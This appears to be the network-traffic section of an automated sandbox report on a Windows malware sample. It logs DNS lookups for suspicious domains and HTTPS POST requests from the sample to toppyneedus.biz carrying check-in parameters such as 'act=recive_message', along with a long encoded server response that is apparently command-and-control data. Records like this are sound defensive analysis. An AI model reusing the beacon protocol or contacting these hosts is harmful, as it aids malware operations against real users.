                                                                                                  Jan 26, 2025 15:48:03.828830957 CET44349703172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:03.829021931 CET49703443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:03.831636906 CET49703443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:03.831669092 CET44349703172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:03.832969904 CET44349703172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:03.834475040 CET49703443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:03.834652901 CET49703443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:03.834744930 CET44349703172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:03.834820032 CET49703443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:03.834836006 CET44349703172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:04.707654953 CET44349703172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:04.707926035 CET44349703172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:04.709203005 CET49703443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:04.709203005 CET49703443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:04.967444897 CET49705443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:04.967492104 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:04.968055010 CET49705443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:04.968055010 CET49705443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:04.968092918 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:05.015265942 CET49703443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:05.015377998 CET44349703172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:05.459119081 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:05.459224939 CET49705443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:05.460684061 CET49705443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:05.460694075 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:05.461020947 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:05.462308884 CET49705443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:05.462503910 CET49705443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:05.462531090 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:05.462610960 CET49705443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:05.462615967 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.110047102 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.110141993 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.110287905 CET49705443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.110513926 CET49705443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.110529900 CET44349705172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.477710009 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.477763891 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.477889061 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.478270054 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.478286028 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.973870993 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.974005938 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.975423098 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.975438118 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.975702047 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:06.977153063 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.977328062 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:06.977359056 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:07.480041981 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:07.480129957 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:07.480184078 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:07.480350018 CET49711443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:07.480367899 CET44349711172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.146831989 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.146873951 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.146944046 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.147234917 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.147245884 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.667402983 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.667495966 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.669188976 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.669200897 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.669451952 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.670917034 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.671912909 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.671952963 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.672080994 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.672107935 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.672276020 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.672321081 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.672452927 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.672483921 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.672652960 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.672672987 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.672844887 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.672863007 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.672871113 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.672883034 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.673027039 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.673042059 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.673065901 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.673203945 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.673223972 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.682063103 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.682274103 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.682301998 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.682327986 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.682343960 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:08.682373047 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:08.686885118 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.270473003 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.270642042 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.270699978 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.270843029 CET49722443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.270848989 CET44349722172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.321877003 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.321922064 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.322006941 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.322370052 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.322386980 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.847553968 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.847641945 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.849133968 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.849144936 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.849400043 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:11.850790977 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.850825071 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:11.850856066 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:12.337049007 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:12.337142944 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:12.337233067 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:12.337462902 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:12.337486982 CET44349746172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:12.337497950 CET49746443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:12.337505102 CET44349746172.67.149.66192.168.2.7
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 26, 2025 15:47:59.140929937 CET5585553192.168.2.71.1.1.1
                                                                                                  Jan 26, 2025 15:47:59.150487900 CET53558551.1.1.1192.168.2.7
                                                                                                  Jan 26, 2025 15:47:59.155700922 CET5309153192.168.2.71.1.1.1
                                                                                                  Jan 26, 2025 15:47:59.166166067 CET53530911.1.1.1192.168.2.7
                                                                                                  Jan 26, 2025 15:47:59.169214010 CET5890453192.168.2.71.1.1.1
                                                                                                  Jan 26, 2025 15:47:59.180417061 CET53589041.1.1.1192.168.2.7
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Jan 26, 2025 15:47:59.140929937 CET192.168.2.71.1.1.10x39e0Standard query (0)financialfreez.clickA (IP address)IN (0x0001)false
                                                                                                  Jan 26, 2025 15:47:59.155700922 CET192.168.2.71.1.1.10x1d2Standard query (0)impolitewearr.bizA (IP address)IN (0x0001)false
                                                                                                  Jan 26, 2025 15:47:59.169214010 CET192.168.2.71.1.1.10xa18fStandard query (0)toppyneedus.bizA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Jan 26, 2025 15:47:59.150487900 CET1.1.1.1192.168.2.70x39e0Name error (3)financialfreez.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                  Jan 26, 2025 15:47:59.166166067 CET1.1.1.1192.168.2.70x1d2Name error (3)impolitewearr.biznonenoneA (IP address)IN (0x0001)false
                                                                                                  Jan 26, 2025 15:47:59.180417061 CET1.1.1.1192.168.2.70xa18fNo error (0)toppyneedus.biz172.67.149.66A (IP address)IN (0x0001)false
                                                                                                  Jan 26, 2025 15:47:59.180417061 CET1.1.1.1192.168.2.70xa18fNo error (0)toppyneedus.biz104.21.29.142A (IP address)IN (0x0001)false
                                                                                                  • toppyneedus.biz
                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.749700172.67.149.664437120C:\Users\user\Desktop\4JPKDcwtDo.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-26 14:48:00 UTC262OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 8
                                                                                                  Host: toppyneedus.biz
                                                                                                  2025-01-26 14:48:00 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                  Data Ascii: act=life
                                                                                                  2025-01-26 14:48:00 UTC1122INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:00 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=qje5c9iiub7r9vd2g5j4q5sg5g; expires=Thu, 22 May 2025 08:34:39 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9QfZLP7%2FU1v81upKPlQn9umepJgyvYhLrDZsjDD72IfcDOU9cOwpqGpDOf%2FioQn0UYICAWbKSDvLmFcVRovrOrBaH9n2l01b9N2OuYxGFHcS0c8JUdkilVr1Pj9u3HTWKEU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d292f9843cd-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2074&min_rtt=2070&rtt_var=785&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1386514&cwnd=252&unsent_bytes=0&cid=ec975741d2145660&ts=1078&x=0"
                                                                                                  2025-01-26 14:48:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                  Data Ascii: 2ok
                                                                                                  2025-01-26 14:48:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.749701172.67.149.664437120C:\Users\user\Desktop\4JPKDcwtDo.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-26 14:48:01 UTC263OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 42
                                                                                                  Host: toppyneedus.biz
                                                                                                  2025-01-26 14:48:01 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d
                                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=
                                                                                                  2025-01-26 14:48:01 UTC1124INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:01 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=qign9klnsgdf3cd0fshl7v0ogu; expires=Thu, 22 May 2025 08:34:40 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wkj04EnX4T1f1JYErpEQbqpM%2FotqFJC1yPlfa9EQ7KHpAuVWVICuyQ6cLYGR9DQ0v3UAn%2F%2F6KLxAxkyNx1u7bCSBE6wuqmmmbMiHbDhe2YsFWWVxC5p%2FDfmiltGOnOg0hw0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d311a5641c3-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1546&rtt_var=597&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=941&delivery_rate=1805813&cwnd=72&unsent_bytes=0&cid=323867f98df5541b&ts=529&x=0"
                                                                                                  2025-01-26 14:48:01 UTC245INData Raw: 34 39 39 34 0d 0a 2f 52 63 37 6f 43 6e 56 4c 51 6f 70 43 69 35 67 71 59 33 51 41 76 2b 44 46 30 66 49 57 6b 75 35 6c 46 4f 2f 2b 44 71 58 55 4e 43 47 4e 55 32 43 45 2b 45 42 4b 46 70 76 44 46 72 64 2f 36 56 6e 30 36 46 32 49 2b 70 67 4c 64 6a 34 49 4e 72 55 47 4f 45 39 38 73 64 78 57 73 78 61 73 41 45 6f 54 48 49 4d 57 76 4c 32 38 6d 65 52 6f 53 31 6c 72 54 41 70 32 50 67 78 33 70 4e 56 35 7a 79 7a 6c 58 74 63 79 45 79 32 53 57 74 46 5a 30 73 46 7a 4f 79 36 62 4a 62 75 66 79 72 71 64 6d 6e 63 37 6e 47 46 32 6e 66 79 4a 4c 47 77 64 6b 6a 4c 43 36 67 42 63 51 74 76 51 45 4b 54 72 37 46 6e 6e 65 39 78 49 36 4d 79 49 39 48 77 4d 4e 75 53 53 76 34 32 75 4a 56 31 58 38 6c 47 76 31 31 6d 54 32 42 41 41 38 62 73 38 69 37 64 35 6d 31
                                                                                                  Data Ascii: 4994/Rc7oCnVLQopCi5gqY3QAv+DF0fIWku5lFO/+DqXUNCGNU2CE+EBKFpvDFrd/6Vn06F2I+pgLdj4INrUGOE98sdxWsxasAEoTHIMWvL28meRoS1lrTAp2Pgx3pNV5zyzlXtcyEy2SWtFZ0sFzOy6bJbufyrqdmnc7nGF2nfyJLGwdkjLC6gBcQtvQEKTr7Fnne9xI6MyI9HwMNuSSv42uJV1X8lGv11mT2BAA8bs8i7d5m1
                                                                                                  2025-01-26 14:48:01 UTC1369INData Raw: 6c 38 6e 68 36 36 66 55 67 7a 49 39 56 35 54 54 79 67 44 74 41 67 6b 79 37 44 7a 41 4c 59 45 41 4d 7a 75 79 39 5a 35 7a 68 5a 79 71 71 4f 79 48 54 38 6a 76 53 6c 56 66 37 4f 4c 57 58 66 46 37 4e 54 4c 39 4a 5a 30 67 6f 41 6b 4c 4d 39 2f 49 34 33 63 46 6c 4a 71 6b 73 4a 4d 71 32 4c 70 4f 44 47 50 49 2b 38 73 63 31 58 38 78 4b 75 6b 39 36 51 32 4e 48 42 39 6e 6b 75 32 32 51 34 58 67 76 70 54 73 70 33 50 77 37 30 70 42 63 2b 44 2b 30 6e 33 55 5a 6a 41 75 77 56 79 67 54 4b 47 38 48 32 2b 69 2b 64 74 2f 62 4e 54 72 6b 49 57 6e 63 2b 6e 47 46 32 6c 44 77 4d 62 47 55 65 6c 72 4b 51 4b 56 50 65 6b 31 6c 53 52 44 4e 36 72 78 71 6e 76 4e 2f 4b 36 77 37 49 4e 44 2f 4e 4e 71 65 47 4c 74 79 74 59 63 31 41 59 4a 71 75 6b 52 6b 51 58 39 4d 51 74 53 68 71 79 43 61 37 54
                                                                                                  Data Ascii: l8nh66fUgzI9V5TTygDtAgky7DzALYEAMzuy9Z5zhZyqqOyHT8jvSlVf7OLWXfF7NTL9JZ0goAkLM9/I43cFlJqksJMq2LpODGPI+8sc1X8xKuk96Q2NHB9nku22Q4XgvpTsp3Pw70pBc+D+0n3UZjAuwVygTKG8H2+i+dt/bNTrkIWnc+nGF2lDwMbGUelrKQKVPek1lSRDN6rxqnvN/K6w7IND/NNqeGLtytYc1AYJqukRkQX9MQtShqyCa7T
                                                                                                  2025-01-26 14:48:01 UTC1369INData Raw: 4a 4e 65 32 66 35 32 64 51 4c 56 71 38 72 56 32 54 63 46 42 39 58 70 72 52 57 5a 4c 46 49 76 77 2f 48 6e 64 35 6e 6c 6c 38 6e 67 6b 32 76 34 33 7a 35 56 56 39 6a 79 38 6b 48 42 57 79 6b 75 33 51 6d 31 50 59 30 63 42 78 75 75 67 61 70 33 70 63 43 53 67 4d 6d 6d 56 74 6a 62 46 32 67 43 31 41 36 57 55 4e 32 7a 42 52 62 6c 49 66 67 74 33 41 68 75 4c 36 4c 34 67 78 61 46 34 4c 61 38 39 4a 74 72 38 50 39 69 51 56 50 30 38 73 59 31 36 58 63 4a 48 76 30 56 6c 52 57 78 45 43 38 44 6b 74 47 43 63 36 7a 56 72 36 6a 38 78 6d 36 35 78 36 5a 31 55 2b 44 33 77 71 6e 5a 58 7a 45 79 68 44 33 63 46 63 51 77 46 78 36 2f 71 49 4a 48 6f 64 53 36 67 50 43 6e 63 2b 7a 54 65 6e 56 76 34 4e 62 69 52 63 6c 33 4f 51 72 70 4a 61 45 78 73 53 52 44 4f 35 72 35 73 33 61 38 31 49 72 4a
                                                                                                  Data Ascii: JNe2f52dQLVq8rV2TcFB9XprRWZLFIvw/Hnd5nll8ngk2v43z5VV9jy8kHBWyku3Qm1PY0cBxuugap3pcCSgMmmVtjbF2gC1A6WUN2zBRblIfgt3AhuL6L4gxaF4La89Jtr8P9iQVP08sY16XcJHv0VlRWxEC8DktGCc6zVr6j8xm65x6Z1U+D3wqnZXzEyhD3cFcQwFx6/qIJHodS6gPCnc+zTenVv4NbiRcl3OQrpJaExsSRDO5r5s3a81IrJ
                                                                                                  2025-01-26 14:48:01 UTC1369INData Raw: 6a 62 52 32 67 43 31 4f 37 75 4e 65 31 66 4c 52 72 46 48 62 30 56 6c 52 77 54 41 36 4c 56 6d 6b 4f 6c 34 49 4b 6b 35 4c 64 48 6b 4d 74 61 51 56 66 39 79 2f 4e 39 79 51 59 49 54 39 32 68 6b 59 6e 68 58 45 4e 32 76 72 53 36 45 6f 58 49 70 36 6d 42 70 32 50 6b 34 30 70 4a 51 2b 6a 32 32 6b 58 4e 66 7a 30 36 34 52 58 70 44 5a 6b 45 4a 78 4f 53 67 59 4a 44 6c 65 53 47 69 4d 79 4f 62 75 48 48 61 67 68 69 74 63 6f 65 53 65 6c 6e 42 58 66 64 51 4a 6c 49 6f 53 77 36 4c 74 2f 4a 73 6b 2b 46 36 4b 61 59 7a 49 64 72 36 50 39 71 66 55 66 30 36 6f 4a 35 78 55 63 4e 46 75 45 35 73 54 6d 31 49 42 63 2f 70 76 53 44 54 6f 58 49 39 36 6d 42 70 39 4e 45 45 6e 37 74 69 74 53 33 38 68 6a 56 65 7a 67 76 76 44 32 52 49 5a 45 51 4e 7a 65 61 2b 61 70 54 71 65 53 36 75 4e 43 44 65
                                                                                                  Data Ascii: jbR2gC1O7uNe1fLRrFHb0VlRwTA6LVmkOl4IKk5LdHkMtaQVf9y/N9yQYIT92hkYnhXEN2vrS6EoXIp6mBp2Pk40pJQ+j22kXNfz064RXpDZkEJxOSgYJDleSGiMyObuHHaghitcoeSelnBXfdQJlIoSw6Lt/Jsk+F6KaYzIdr6P9qfUf06oJ5xUcNFuE5sTm1IBc/pvSDToXI96mBp9NEEn7titS38hjVezgvvD2RIZEQNzea+apTqeS6uNCDe
                                                                                                  2025-01-26 14:48:01 UTC1369INData Raw: 74 65 35 7a 57 37 6a 58 74 55 7a 55 4f 2f 52 6d 6c 50 62 55 45 45 78 2b 57 7a 5a 35 50 76 66 57 58 6b 65 43 37 44 74 6d 6d 64 75 30 6a 75 49 4b 53 53 56 46 54 4e 43 36 67 42 63 51 74 76 51 45 4b 54 72 37 74 79 6d 65 78 6e 4c 4b 30 32 4a 74 6a 6b 4d 4e 43 52 53 76 49 39 74 70 68 35 58 38 31 4e 74 6b 70 69 52 32 39 4a 43 63 54 6a 38 69 37 64 35 6d 31 6c 38 6e 67 48 30 4f 55 6d 33 70 52 54 34 79 6e 79 67 44 74 41 67 6b 79 37 44 7a 41 4c 61 30 63 4a 7a 2b 2b 2b 59 4a 6e 73 64 54 65 6c 50 79 37 53 2f 53 50 58 6e 56 2f 2b 4f 72 6d 51 63 30 76 4f 52 61 56 4b 65 6c 6b 6f 41 6b 4c 4d 39 2f 49 34 33 64 64 79 4e 62 6f 37 61 2b 72 67 4d 73 75 52 56 66 6c 79 72 64 46 73 47 63 56 48 39 78 63 6f 54 57 64 46 41 63 54 75 75 32 79 51 35 48 77 67 71 7a 34 74 30 66 77 78 32
                                                                                                  Data Ascii: te5zW7jXtUzUO/RmlPbUEEx+WzZ5PvfWXkeC7Dtmmdu0juIKSSVFTNC6gBcQtvQEKTr7tymexnLK02JtjkMNCRSvI9tph5X81NtkpiR29JCcTj8i7d5m1l8ngH0OUm3pRT4ynygDtAgky7DzALa0cJz+++YJnsdTelPy7S/SPXnV/+OrmQc0vORaVKelkoAkLM9/I43ddyNbo7a+rgMsuRVflyrdFsGcVH9xcoTWdFAcTuu2yQ5Hwgqz4t0fwx2
                                                                                                  2025-01-26 14:48:01 UTC1369INData Raw: 38 71 39 39 79 56 59 49 54 39 30 78 76 53 47 6c 47 43 38 66 67 74 57 53 50 36 33 49 33 71 7a 6b 69 31 76 6f 78 30 4a 64 53 39 44 75 2f 6b 33 68 65 78 55 53 79 44 79 59 4c 62 31 52 43 6b 36 2b 54 62 5a 62 74 4c 6e 2f 71 4a 32 66 43 74 6a 62 52 32 67 43 31 4d 72 69 61 66 31 54 42 52 4c 52 64 61 55 31 36 54 41 2f 42 2f 62 68 72 6d 4f 78 34 4b 4b 6b 2b 4c 39 44 36 49 39 53 61 57 2f 35 79 2f 4e 39 79 51 59 49 54 39 32 78 2f 58 57 4a 4c 44 74 33 6b 73 32 4f 4c 37 47 56 6c 35 48 67 34 33 4f 64 78 68 59 78 49 34 6a 57 74 30 57 77 5a 78 55 66 33 46 79 68 4e 59 55 6f 46 7a 65 47 67 5a 5a 76 75 65 69 79 6a 50 43 48 59 39 6a 58 5a 6e 56 33 32 50 72 6d 59 64 6c 62 47 51 72 6c 47 5a 77 73 6d 44 41 58 54 72 2b 6f 67 76 50 70 32 4b 61 64 34 4e 70 58 76 63 64 71 57 47 4b
                                                                                                  Data Ascii: 8q99yVYIT90xvSGlGC8fgtWSP63I3qzki1vox0JdS9Du/k3hexUSyDyYLb1RCk6+TbZbtLn/qJ2fCtjbR2gC1Mriaf1TBRLRdaU16TA/B/bhrmOx4KKk+L9D6I9SaW/5y/N9yQYIT92x/XWJLDt3ks2OL7GVl5Hg43OdxhYxI4jWt0WwZxUf3FyhNYUoFzeGgZZvueiyjPCHY9jXZnV32PrmYdlbGQrlGZwsmDAXTr+ogvPp2Kad4NpXvcdqWGK
                                                                                                  2025-01-26 14:48:01 UTC1369INData Raw: 4e 58 6e 4a 58 62 4a 49 66 67 6c 64 54 77 7a 46 36 4b 51 67 67 74 34 37 5a 61 55 69 61 59 50 50 4b 4a 32 64 56 4c 56 71 38 6f 70 79 57 63 56 52 6f 55 68 6b 57 6d 4e 42 44 75 6e 67 74 58 61 65 37 6e 59 30 6f 33 51 69 31 72 5a 2f 6e 5a 31 41 74 57 72 79 73 48 4a 50 77 57 53 30 58 6d 45 4c 4a 67 77 46 33 61 2f 71 49 4b 4f 68 5a 79 61 36 4f 79 62 4b 79 48 47 46 67 32 61 31 4f 61 53 59 5a 56 72 55 51 4c 70 44 65 58 55 6f 46 46 61 5a 76 65 41 79 7a 2f 34 31 4f 70 56 32 61 64 71 32 61 65 53 44 47 4f 4e 79 36 73 30 37 47 64 41 4c 37 77 38 76 53 48 70 65 42 4d 6a 35 73 53 65 6a 33 31 49 7a 6f 44 38 35 33 4f 45 2b 6e 64 51 59 2b 6e 4c 71 70 6a 56 51 78 56 43 6d 57 57 56 62 62 77 77 39 68 61 2b 71 49 4d 57 68 51 43 61 6b 4e 69 37 4e 35 33 7a 36 6a 46 4c 79 49 72 57
